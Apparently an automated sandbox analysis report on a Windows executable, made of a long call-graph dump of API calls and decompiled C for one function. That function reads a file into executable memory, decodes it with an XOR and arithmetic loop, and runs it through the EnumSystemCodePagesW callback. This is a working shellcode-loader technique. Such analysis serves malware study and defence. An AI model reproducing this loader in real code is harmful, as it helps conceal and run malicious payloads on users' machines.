24c92f 10402->10404 10403->10404 10405 24c94b RegSetValueExW 10404->10405 10406 24c997 10404->10406 10405->10406 10407 24c9b0 RegSetValueExW 10406->10407 10408 24c9f9 10406->10408 10407->10408 10409 24ca12 RegSetValueExW 10408->10409 10410 24ca5b 10408->10410 10409->10410 10411 24ca74 RegSetValueExW 10410->10411 10412 24cabd 10410->10412 10411->10412 10413 24cad6 RegSetValueExW 10412->10413 10414 24cb1f 10412->10414 10413->10414 10415 24cb38 RegSetValueExW 10414->10415 10416 24cb81 10414->10416 10415->10416 10417 24cb9a RegSetValueExW 10416->10417 10418 24cbe3 10416->10418 10417->10418 10419 24cc0b RegSetValueExW 10418->10419 10420 24cc70 10418->10420 10419->10420 10421 24cc8c RegSetValueExW 10420->10421 10422 24ccd5 10420->10422 10421->10422 10423 24ccfd RegSetValueExW 10422->10423 10424 24c44d RegCloseKey 10422->10424 10423->10424 10424->10382 10426 242d5e 10425->10426 10470 242e60 10426->10470 10430 248eec 10429->10430 10432 248f38 10429->10432 10430->10432 10434 2490ef 10430->10434 10435 248f1a IsWindowVisible 10430->10435 10431 2490ce 10495 246c70 SetRect 10431->10495 10432->10431 10437 248f95 GetDC 10432->10437 10436 24915d GetWindowLongW AdjustWindowRect 10434->10436 10441 2494fb 10434->10441 10435->10432 10435->10434 10438 2492c1 ShowScrollBar 10436->10438 10439 24920f GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10436->10439 10440 248fbb CreateCompatibleBitmap ReleaseDC SelectObject 10437->10440 10465 244f24 10437->10465 10442 2492e8 10438->10442 10439->10442 10443 249054 DeleteObject 10440->10443 10444 24906c SetRect 10440->10444 10445 249537 ScrollWindow SetScrollPos SetScrollPos InvalidateRect 10441->10445 10451 24963f 10441->10451 10447 2493aa ShowScrollBar 10442->10447 10448 2492fa GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10442->10448 10443->10444 10485 24b2c0 10444->10485 10445->10451 10449 2493d1 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 10447->10449 10448->10449 10449->10451 10450 2497bf 10453 249804 10450->10453 10497 24b460 10450->10497 10451->10450 10452 24b2c0 18 API calls 10451->10452 10456 249760 10452->10456 10455 249822 GetFocus 10453->10455 10462 2498bb 10453->10462 10457 249856 10455->10457 10455->10462 10496 246c70 SetRect 10456->10496 10459 2498c3 DestroyCaret 10457->10459 10460 249869 CreateCaret 10457->10460 10459->10462 10506 24a550 10460->10506 10461 249781 InvalidateRect UpdateWindow 10461->10450 10464 24a550 3 API calls 10462->10464 10462->10465 10464->10465 10466 2417c0 10465->10466 10468 2417d4 10466->10468 10467 241832 10467->10296 10468->10467 10511 241000 10468->10511 10471 242f62 GetDC 10470->10471 10477 242e91 10470->10477 10472 242f92 CreateFontIndirectW 10471->10472 10483 242d73 10471->10483 10473 242fad ReleaseDC 10472->10473 10474 242fd8 SelectObject GetTextMetricsW 10472->10474 10473->10483 10475 243027 GetTextFaceW SelectObject ReleaseDC 10474->10475 10476 250f8d ___std_exception_copy 14 API calls 10475->10476 10478 2430d4 ___std_exception_copy CatchIt 10476->10478 10477->10471 10477->10483 10479 243112 GetCPInfo 10478->10479 10480 24313a 10479->10480 10481 243166 DeleteObject 10480->10481 10482 24317e 10480->10482 10481->10482 10482->10483 10484 2431af DeleteObject 10482->10484 10483->10369 10484->10483 10486 24b2f2 10485->10486 10487 24b2df ___std_exception_copy 10485->10487 10486->10431 10487->10486 10488 24b33a SelectObject 10487->10488 10489 24b370 10488->10489 10490 24b419 SelectObject 10489->10490 10492 24b396 SetBkColor SetTextColor 10489->10492 10491 250f8d ___std_exception_copy 14 API calls 10490->10491 10493 24b442 10491->10493 10492->10489 10494 250f8d ___std_exception_copy 14 API calls 10493->10494 10494->10486 10495->10434 10496->10461 10498 24b487 GetFocus 10497->10498 10499 24b4ac 10497->10499 10498->10499 10500 24b4a6 DestroyCaret 10498->10500 10501 24b4bf DeleteObject 10499->10501 10505 24b4d7 __FrameHandler3::FrameUnwindToState 10499->10505 10500->10499 10501->10505 10502 24b548 10502->10453 10503 24b643 CreateBitmap 10504 250f8d ___std_exception_copy 14 API calls 10503->10504 10504->10502 10505->10502 10505->10503 10507 24a588 10506->10507 10508 24a569 GetFocus 10506->10508 10507->10462 10508->10507 10509 24a58d 10508->10509 10510 24a5c0 SetCaretPos ShowCaret 10509->10510 10510->10507 10512 241028 10511->10512 10514 24101c 10511->10514 10516 24105e CatchIt 10512->10516 10517 25101c 10512->10517 10514->10467 10516->10514 10530 241200 10516->10530 10518 255e63 10517->10518 10519 255e70 10518->10519 10520 255e7b 10518->10520 10521 25490e 15 API calls 10519->10521 10522 255e83 10520->10522 10528 255e8c _unexpected 10520->10528 10527 255e78 10521->10527 10523 253703 __freea 14 API calls 10522->10523 10523->10527 10524 255eb6 HeapReAlloc 10524->10527 10524->10528 10525 255e91 10526 254824 ___std_exception_copy 14 API calls 10525->10526 10526->10527 10527->10516 10528->10524 10528->10525 10529 253a3f _unexpected 2 API calls 10528->10529 10529->10528 10546 241240 CatchIt 10530->10546 10531 24126e CatchIt 10534 2415d2 10531->10534 10554 2450e0 10531->10554 10532 2415e4 __FrameHandler3::FrameUnwindToState 10532->10514 10534->10532 10536 241649 10534->10536 10537 24161b 10534->10537 10539 241635 10534->10539 10538 241678 10536->10538 10575 245530 10536->10575 10540 244f40 16 API calls 10537->10540 10579 2456d0 10538->10579 10543 250f8d ___std_exception_copy 14 API calls 10539->10543 10540->10539 10544 241778 10543->10544 10545 250f8d ___std_exception_copy 14 API calls 10544->10545 10545->10532 10546->10531 10547 244f40 10546->10547 10548 244f68 10547->10548 10553 244f63 CatchIt 10547->10553 10549 244f75 10548->10549 10550 24500d 10548->10550 10551 2456d0 16 API calls 10549->10551 10552 2456d0 16 API calls 10550->10552 10550->10553 10551->10553 10552->10553 10553->10546 10583 246c70 SetRect 10554->10583 10556 245118 10558 245308 10556->10558 10584 246cc0 10556->10584 10566 2453c7 10558->10566 10592 246ed0 10558->10592 10559 24513a 10561 2451c8 10559->10561 10572 246d70 8 API calls 10559->10572 10561->10558 10588 246d70 10561->10588 10562 2454f1 10618 2473e0 10562->10618 10563 2454b2 10563->10562 10567 246f80 4 API calls 10563->10567 10565 24549d 10606 247080 10565->10606 10566->10563 10566->10565 10598 246f80 10566->10598 10567->10562 10572->10559 10576 245556 ___std_exception_copy CatchIt 10575->10576 10578 245551 CatchIt 10575->10578 10577 250f8d ___std_exception_copy 14 API calls 10576->10577 10576->10578 10577->10578 10578->10538 10580 245706 10579->10580 10582 2456fa 10579->10582 10581 25101c 16 API calls 10580->10581 10581->10582 10582->10539 10583->10556 10585 246cf6 10584->10585 10586 246cd9 10584->10586 10585->10559 10587 2474c0 4 API calls 10586->10587 10587->10585 10589 246d95 10588->10589 10590 246ed0 8 API calls 10589->10590 10591 246dd3 10589->10591 10590->10591 10591->10561 10593 246ef9 10592->10593 10594 246f37 SetRect 10593->10594 10595 246f1d 10593->10595 10597 246f2f 10594->10597 10596 247080 7 API calls 10595->10596 10596->10597 10597->10566 10599 246ffc 10598->10599 10601 246fa1 _strlen 10598->10601 10600 246fe8 10599->10600 10602 2474c0 4 API calls 10599->10602 10634 2476a0 10600->10634 10605 2474c0 4 API calls 10601->10605 10602->10599 10605->10600 10608 247097 10606->10608 10607 2470c6 10607->10563 10608->10607 10609 2470dd 10608->10609 10610 2470f9 10608->10610 10643 2432b0 10609->10643 10610->10607 10612 246cc0 4 API calls 10610->10612 10614 24711d 10612->10614 10613 247233 10647 246c70 SetRect 10613->10647 10614->10613 10616 2476a0 4 API calls 10614->10616 10617 2474c0 WriteFile GetLastError WriteFile GetLastError 10614->10617 10616->10614 10617->10614 10619 2473fe 10618->10619 10625 245501 10618->10625 10620 247488 10619->10620 10621 24740e 10619->10621 10622 246cc0 4 API calls 10620->10622 10628 247473 10620->10628 10624 2476a0 4 API calls 10621->10624 10622->10628 10623 2475f0 2 API calls 10623->10625 10626 247443 10624->10626 10629 2431f0 10625->10629 10627 2474c0 4 API calls 10626->10627 10626->10628 10627->10628 10628->10623 10630 243226 10629->10630 10631 243213 10629->10631 10630->10534 10631->10630 10632 243245 SetTimer 10631->10632 10633 243279 PostMessageW 10631->10633 10632->10630 10633->10630 10635 2476c1 10634->10635 10636 247757 10635->10636 10637 24788e 10635->10637 10638 2476f9 _strlen 10635->10638 10642 247075 10635->10642 10636->10638 10640 2474c0 4 API calls 10636->10640 10637->10638 10639 246cc0 4 API calls 10637->10639 10641 2474c0 4 API calls 10638->10641 10638->10642 10639->10638 10640->10638 10641->10642 10642->10565 10644 2432db 10643->10644 10645 2431f0 2 API calls 10644->10645 10646 2433a1 10645->10646 10646->10607 10647->10607 10649 248c78 10648->10649 10651 248c8d 10648->10651 10650 25101c 16 API calls 10649->10650 10650->10651 10651->10328 10653 248ce7 10652->10653 10654 248c60 16 API calls 10653->10654 10655 242c53 LeaveCriticalSection 10653->10655 10654->10653 10655->10328 10655->10334 10657 252642 10656->10657 10660 252648 10656->10660 10658 25220f _unexpected 6 API calls 10657->10658 10658->10660 10659 25224e _unexpected 6 API calls 10661 252664 10659->10661 10660->10659 10680 25264c SetLastError 10660->10680 10663 2548b1 _unexpected 14 API calls 10661->10663 10661->10680 10666 252679 10663->10666 10664 2526e1 10667 251c1c __FrameHandler3::FrameUnwindToState 39 API calls 10664->10667 10665 2511cc 10683 251c1c 10665->10683 10668 252681 10666->10668 10669 252692 10666->10669 10672 2526e6 10667->10672 10670 25224e _unexpected 6 API calls 10668->10670 10671 25224e _unexpected 6 API calls 10669->10671 10673 25268f 10670->10673 10674 25269e 10671->10674 10678 253703 __freea 14 API calls 10673->10678 10675 2526a2 10674->10675 10676 2526b9 10674->10676 10677 25224e _unexpected 6 API calls 10675->10677 10679 25293d _unexpected 14 API calls 10676->10679 10677->10673 10678->10680 10681 2526c4 10679->10681 10680->10664 10680->10665 10682 253703 __freea 14 API calls 10681->10682 10682->10680 10694 253af5 10683->10694 10686 251c2c 10688 251c36 IsProcessorFeaturePresent 10686->10688 10689 251c55 10686->10689 10691 251c42 10688->10691 10690 24ffb0 __FrameHandler3::FrameUnwindToState 23 API calls 10689->10690 10692 251c5f 10690->10692 10693 25381a __FrameHandler3::FrameUnwindToState 8 API calls 10691->10693 10693->10689 10724 253d79 10694->10724 10697 253b1c 10698 253b28 __FrameHandler3::FrameUnwindToState 10697->10698 10699 25277d __FrameHandler3::FrameUnwindToState 14 API calls 10698->10699 10703 253b55 __FrameHandler3::FrameUnwindToState 10698->10703 10706 253b4f __FrameHandler3::FrameUnwindToState 10698->10706 10699->10706 10700 253b9c 10702 254824 ___std_exception_copy 14 API calls 10700->10702 10701 253b86 10701->10686 10704 253ba1 10702->10704 10705 253bc8 10703->10705 10735 25259d EnterCriticalSection 10703->10735 10707 2537d6 ___std_exception_copy 29 API calls 10704->10707 10710 253cfb 10705->10710 10713 253c0a 10705->10713 10721 253c39 10705->10721 10706->10700 10706->10701 10706->10703 10707->10701 10714 253d06 10710->10714 10740 2525b4 LeaveCriticalSection 10710->10740 10712 24ffb0 __FrameHandler3::FrameUnwindToState 23 API calls 10715 253d0e 10712->10715 10717 25262c _unexpected 41 API calls 10713->10717 10713->10721 10714->10712 10718 253c2e 10717->10718 10720 25262c _unexpected 41 API calls 10718->10720 10719 25262c _unexpected 41 API calls 10722 253c8e 10719->10722 10720->10721 10736 253ca8 10721->10736 10722->10701 10723 25262c _unexpected 41 API calls 10722->10723 10723->10701 10725 253d85 __FrameHandler3::FrameUnwindToState 10724->10725 10730 25259d EnterCriticalSection 10725->10730 10727 253d93 10731 253dd1 10727->10731 10730->10727 10734 2525b4 LeaveCriticalSection 10731->10734 10733 251c21 10733->10686 10733->10697 10734->10733 10735->10705 10737 253cae 10736->10737 10739 253c7f 10736->10739 10741 2525b4 LeaveCriticalSection 10737->10741 10739->10701 10739->10719 10739->10722 10740->10714 10741->10739 10743 25015e 10742->10743 10751 25016f 10742->10751 10753 250019 GetModuleHandleW 10743->10753 10748 24ffd1 10748->10128 10760 2502b3 10751->10760 10754 250025 10753->10754 10754->10751 10755 25005c GetModuleHandleExW 10754->10755 10756 25009b GetProcAddress 10755->10756 10759 2500af 10755->10759 10756->10759 10757 2500c2 FreeLibrary 10758 2500cb 10757->10758 10758->10751 10759->10757 10759->10758 10761 2502bf __FrameHandler3::FrameUnwindToState 10760->10761 10775 25259d EnterCriticalSection 10761->10775 10763 2502c9 10776 2501c8 10763->10776 10765 2502d6 10780 2502f4 10765->10780 10768 250100 10805 2500de 10768->10805 10771 25011e 10773 25005c __FrameHandler3::FrameUnwindToState 3 API calls 10771->10773 10772 25010e GetCurrentProcess TerminateProcess 10772->10771 10774 250126 ExitProcess 10773->10774 10775->10763 10778 2501d4 __FrameHandler3::FrameUnwindToState 10776->10778 10777 25023b __FrameHandler3::FrameUnwindToState 10777->10765 10778->10777 10783 2507ee 10778->10783 10804 2525b4 LeaveCriticalSection 10780->10804 10782 2501a7 10782->10748 10782->10768 10784 2507fa __EH_prolog3 10783->10784 10787 250a79 10784->10787 10786 250821 __FrameHandler3::FrameUnwindToState 10786->10777 10788 250a85 __FrameHandler3::FrameUnwindToState 10787->10788 10795 25259d EnterCriticalSection 10788->10795 10790 250a93 10796 250944 10790->10796 10795->10790 10798 25095b 10796->10798 10799 250963 10796->10799 10797 253703 __freea 14 API calls 10797->10798 10800 250ac8 10798->10800 10799->10797 10799->10798 10803 2525b4 LeaveCriticalSection 10800->10803 10802 250ab1 10802->10786 10803->10802 10804->10782 10810 2541cd GetPEB 10805->10810 10808 2500fa 10808->10771 10808->10772 10809 2500e8 GetPEB 10809->10808 10811 2541e7 10810->10811 10812 2500e3 10810->10812 10814 252369 10811->10814 10812->10808 10812->10809 10815 252474 _unexpected 5 API calls 10814->10815 10816 252385 10815->10816 10816->10812 10818 24feb4 10817->10818 10819 24fec6 ___scrt_uninitialize_crt 10817->10819 10820 24fec2 10818->10820 10822 253ddd 10818->10822 10819->10191 10820->10191 10825 253f0c 10822->10825 10828 253fe5 10825->10828 10829 253ff1 __FrameHandler3::FrameUnwindToState 10828->10829 10836 25259d EnterCriticalSection 10829->10836 10831 254067 10845 254085 10831->10845 10834 253ffb ___scrt_uninitialize_crt 10834->10831 10837 253f59 10834->10837 10836->10834 10838 253f65 __FrameHandler3::FrameUnwindToState 10837->10838 10848 254091 EnterCriticalSection 10838->10848 10840 253f6f ___scrt_uninitialize_crt 10844 253fa8 10840->10844 10849 253de6 10840->10849 10860 253fd9 10844->10860 10962 2525b4 LeaveCriticalSection 10845->10962 10847 253de4 10847->10820 10848->10840 10850 253dfb ___std_exception_copy 10849->10850 10851 253e02 10850->10851 10852 253e0d 10850->10852 10853 253f0c ___scrt_uninitialize_crt 70 API calls 10851->10853 10863 253e4b 10852->10863 10856 253e08 ___std_exception_copy 10853->10856 10856->10844 10858 253e2e 10876 256535 10858->10876 10961 2540a5 LeaveCriticalSection 10860->10961 10862 253fc7 10862->10834 10864 253e64 10863->10864 10868 253e17 10863->10868 10865 256654 ___scrt_uninitialize_crt 29 API calls 10864->10865 10864->10868 10866 253e80 10865->10866 10887 25687b 10866->10887 10868->10856 10869 256654 10868->10869 10870 256675 10869->10870 10871 256660 10869->10871 10870->10858 10872 254824 ___std_exception_copy 14 API calls 10871->10872 10873 256665 10872->10873 10874 2537d6 ___std_exception_copy 29 API calls 10873->10874 10875 256670 10874->10875 10875->10858 10877 256546 10876->10877 10878 256553 10876->10878 10879 254824 ___std_exception_copy 14 API calls 10877->10879 10880 25659c 10878->10880 10884 25657a 10878->10884 10882 25654b 10879->10882 10881 254824 ___std_exception_copy 14 API calls 10880->10881 10883 2565a1 10881->10883 10882->10856 10885 2537d6 ___std_exception_copy 29 API calls 10883->10885 10928 2565b2 10884->10928 10885->10882 10888 256887 __FrameHandler3::FrameUnwindToState 10887->10888 10889 25694b 10888->10889 10891 2568dc 10888->10891 10897 25688f 10888->10897 10890 253962 ___std_exception_copy 29 API calls 10889->10890 10890->10897 10898 255dee EnterCriticalSection 10891->10898 10893 2568e2 10894 2568ff 10893->10894 10899 25667b 10893->10899 10925 256943 10894->10925 10897->10868 10898->10893 10900 2566a0 10899->10900 10923 2566c3 ___scrt_uninitialize_crt 10899->10923 10901 2566a4 10900->10901 10903 256702 10900->10903 10902 253962 ___std_exception_copy 29 API calls 10901->10902 10902->10923 10904 256719 10903->10904 10906 2588dc ___scrt_uninitialize_crt 31 API calls 10903->10906 10905 256983 ___scrt_uninitialize_crt 42 API calls 10904->10905 10907 256723 10905->10907 10906->10904 10908 256769 10907->10908 10909 256729 10907->10909 10912 25677d 10908->10912 10913 2567cc WriteFile 10908->10913 10910 256730 10909->10910 10911 256753 10909->10911 10918 256dd3 ___scrt_uninitialize_crt 6 API calls 10910->10918 10910->10923 10914 256a01 ___scrt_uninitialize_crt 47 API calls 10911->10914 10916 256785 10912->10916 10917 2567ba 10912->10917 10915 2567ee GetLastError 10913->10915 10913->10923 10914->10923 10915->10923 10920 2567a8 10916->10920 10921 25678a 10916->10921 10919 256e3b ___scrt_uninitialize_crt 7 API calls 10917->10919 10918->10923 10919->10923 10922 256fff ___scrt_uninitialize_crt 8 API calls 10920->10922 10921->10923 10924 256f16 ___scrt_uninitialize_crt 7 API calls 10921->10924 10922->10923 10923->10894 10924->10923 10926 255e11 ___scrt_uninitialize_crt LeaveCriticalSection 10925->10926 10927 256949 10926->10927 10927->10897 10929 2565be __FrameHandler3::FrameUnwindToState 10928->10929 10941 255dee EnterCriticalSection 10929->10941 10931 2565cd 10932 256612 10931->10932 10942 255ba5 10931->10942 10933 254824 ___std_exception_copy 14 API calls 10932->10933 10935 256619 10933->10935 10958 256648 10935->10958 10936 2565f9 FlushFileBuffers 10936->10935 10937 256605 GetLastError 10936->10937 10955 254837 10937->10955 10941->10931 10943 255bb2 10942->10943 10947 255bc7 10942->10947 10944 254837 ___scrt_uninitialize_crt 14 API calls 10943->10944 10946 255bb7 10944->10946 10945 254837 ___scrt_uninitialize_crt 14 API calls 10949 255bf7 10945->10949 10950 254824 ___std_exception_copy 14 API calls 10946->10950 10947->10945 10948 255bec 10947->10948 10948->10936 10951 254824 ___std_exception_copy 14 API calls 10949->10951 10952 255bbf 10950->10952 10953 255bff 10951->10953 10952->10936 10954 2537d6 ___std_exception_copy 29 API calls 10953->10954 10954->10952 10956 25277d __FrameHandler3::FrameUnwindToState 14 API calls 10955->10956 10957 25483c 10956->10957 10957->10932 10959 255e11 ___scrt_uninitialize_crt LeaveCriticalSection 10958->10959 10960 256631 10959->10960 10960->10882 10961->10862 10962->10847 10963 24d1de 10968 24d760 SetUnhandledExceptionFilter 10963->10968 10965 24d1e3 10969 250f44 10965->10969 10967 24d1ee 10968->10965 10970 250f50 10969->10970 10971 250f6a 10969->10971 10970->10971 10972 254824 ___std_exception_copy 14 API calls 10970->10972 10971->10967 10973 250f5a 10972->10973 10974 2537d6 ___std_exception_copy 29 API calls 10973->10974 10975 250f65 10974->10975 10975->10967

                                                                                                                          Executed Functions

                                                                                                                          Function 002418D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 461filememoryCOMMONCrypto
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 2418d0-241939 call 251011 3 24193f-241946 0->3 4 24194b-241a1d call 24fc70 CreateFileW GetFileSize VirtualAlloc ReadFile 0->4 5 2420aa-2420b6 3->5 8 241a20-241b11 4->8 9 241b17 8->9 10 241b1c-241b3b EnumSystemCodePagesW call 250f8d 8->10 9->8 12 241b40 10->12 13 241b47-241b4d 12->13 14 241b53-241b66 13->14 15 241b6b-241ba2 GetOEMCP call 250f82 13->15 14->13 18 241bb4 15->18 19 241ba8-241baf 15->19 20 241bbb-241bc1 18->20 19->5 21 241bc7-241be6 call 2511f7 20->21 22 241ec1-241ec8 20->22 31 241bec-241bf3 21->31 32 241bf8-241c17 call 2511f7 21->32 24 241ece-241ed5 22->24 25 241eda-241ede 22->25 24->5 27 241ee4 25->27 28 241eeb-241eef 25->28 27->28 29 241ef5 28->29 30 241efc-241f2b call 2420c0 28->30 29->30 38 241f31-241f38 30->38 39 241f3d-241f41 30->39 34 241eb3-241ebc 31->34 40 241c3d-241c5c call 2511f7 32->40 41 241c1d-241c38 32->41 34->20 38->5 42 241f47-241f78 GetStdHandle * 2 39->42 43 241fe3-241ff7 call 242420 39->43 52 241c62-241c6e 40->52 53 241cea-241d09 call 2511f7 40->53 41->34 46 241f7e-241f85 42->46 47 241f8b-241fa3 call 2422f0 42->47 55 241ffd-242004 43->55 56 242009-24204e GetStartupInfoW call 251259 call 242790 43->56 46->47 50 241fd4 46->50 65 241fcf 47->65 66 241fa9-241fbd call 242380 47->66 54 241fde 50->54 59 241c74-241c7b 52->59 60 241c80-241caa call 251381 52->60 69 241d97-241db6 call 2511f7 53->69 70 241d0f-241d1b 53->70 62 24208f-2420a7 call 2429c0 54->62 55->5 90 242054-24205e 56->90 91 242063-24206e 56->91 59->5 74 241cb0-241cb7 60->74 75 241cbd-241cc4 60->75 62->5 65->54 66->65 86 241fc3-241fca 66->86 88 241dbc-241dc8 69->88 89 241e1e-241e3d call 2511f7 69->89 78 241d21-241d28 70->78 79 241d2d-241d57 call 251381 70->79 74->75 81 241cd9-241ce0 74->81 75->81 82 241cca-241cd3 75->82 78->5 94 241d5d-241d64 79->94 95 241d6a-241d71 79->95 81->5 82->81 87 241ce5 82->87 86->5 87->34 96 241dce-241dd5 88->96 97 241dda-241e07 call 251381 88->97 103 241ea7-241eae 89->103 104 241e43-241e4f 89->104 98 242073-24208c ShowWindow 90->98 91->98 94->95 100 241d86-241d8d 94->100 95->100 101 241d77-241d80 95->101 96->5 109 241e0d-241e14 97->109 110 241e19 97->110 98->62 100->5 101->100 105 241d92 101->105 103->5 107 241e55-241e5c 104->107 108 241e61-241e90 call 251381 104->108 105->34 107->5 113 241e96-241e9d 108->113 114 241ea2 108->114 109->5 110->34 113->5 114->34
                                                                                                                          C-Code - Quality: 17%
                                                                                                                          			E002418D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				struct _OVERLAPPED* _t244;
				void* _t248;
				void* _t252;
				int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				void* _t299;
				void* _t300;
				signed int _t304;
				signed int _t307;
				signed int _t310;
				signed int _t313;
				signed int _t316;
				signed int _t319;
				signed int _t322;
				signed int _t324;
				signed int _t332;
				signed int _t338;
				signed int _t345;
				intOrPtr _t374;
				void* _t431;
				void* _t434;
				void* _t438;
				signed int* _t439;
				signed int* _t440;
				intOrPtr* _t441;
				signed int* _t442;
				intOrPtr* _t443;
				signed int* _t444;
				intOrPtr* _t446;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900; // executed
				_t244 = E00251011(); // executed
				_v76 = _t244;
				if(_v76 != 0) {
					E0024FC70(_t431, _v76, 0x54, 0x3d0900);
					_t248 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v44 = _t248;
					_v48 = GetFileSize(_v44, 0);
					_t252 = VirtualAlloc(0, _v48, 0x3000, 0x40); // executed
					_v40 = _t252;
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0); // executed
					_t438 = _t434 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x3a;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000065;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000b5;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000026;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000cd;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x9a;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0x34;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??); // executed
					_t439 = _t438 - 8;
					 *_t439 = _v76;
					E00250F8D();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0x264918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t277 = GetOEMCP();
					 *0x2649b8 = _t277;
					 *0x2649b4 = _t277;
					 *0x2649a4 = 0x32;
					_t278 =  *0x2649a4; // 0x0
					 *_t439 = _t278;
					_v176 = 4;
					_t279 = E00250F82();
					 *0x2649a0 = _t279;
					__eflags = _t279;
					if(_t279 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t307 = E002511F7();
							__eflags = _t307;
							if(_t307 != 0) {
								 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t310 = E002511F7();
								__eflags = _t310;
								if(_t310 != 0) {
									 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t313 = E002511F7();
									__eflags = _t313;
									if(_t313 != 0) {
										 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t316 = E002511F7();
										__eflags = _t316;
										if(_t316 != 0) {
											 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t319 = E002511F7();
											__eflags = _t319;
											if(_t319 != 0) {
												 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t322 = E002511F7();
												__eflags = _t322;
												if(_t322 != 0) {
													_v16 = 1;
												} else {
													_t324 = _v68 + 1;
													_v68 = _t324;
													__eflags = _t324 - _v52;
													if(_t324 != _v52) {
														 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0x264914 = E00251381();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t332 = _v68 + 1;
												_v68 = _t332;
												__eflags = _t332 - _v52;
												if(_t332 != _v52) {
													 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E00251381();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t338 = _v68 + 1;
											_v68 = _t338;
											__eflags = _t338 - _v52;
											if(_t338 != _v52) {
												 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E00251381();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0x264920;
													if( *0x264920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t345 = _v68 + 1;
										_v68 = _t345;
										__eflags = _t345 - _v52;
										if(_t345 != _v52) {
											 *_t439 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E00251381();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0x264920;
												if( *0x264920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0x264920 = 1;
									 *0x264924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
							goto L72;
						}
						__eflags =  *0x264914;
						if( *0x264914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
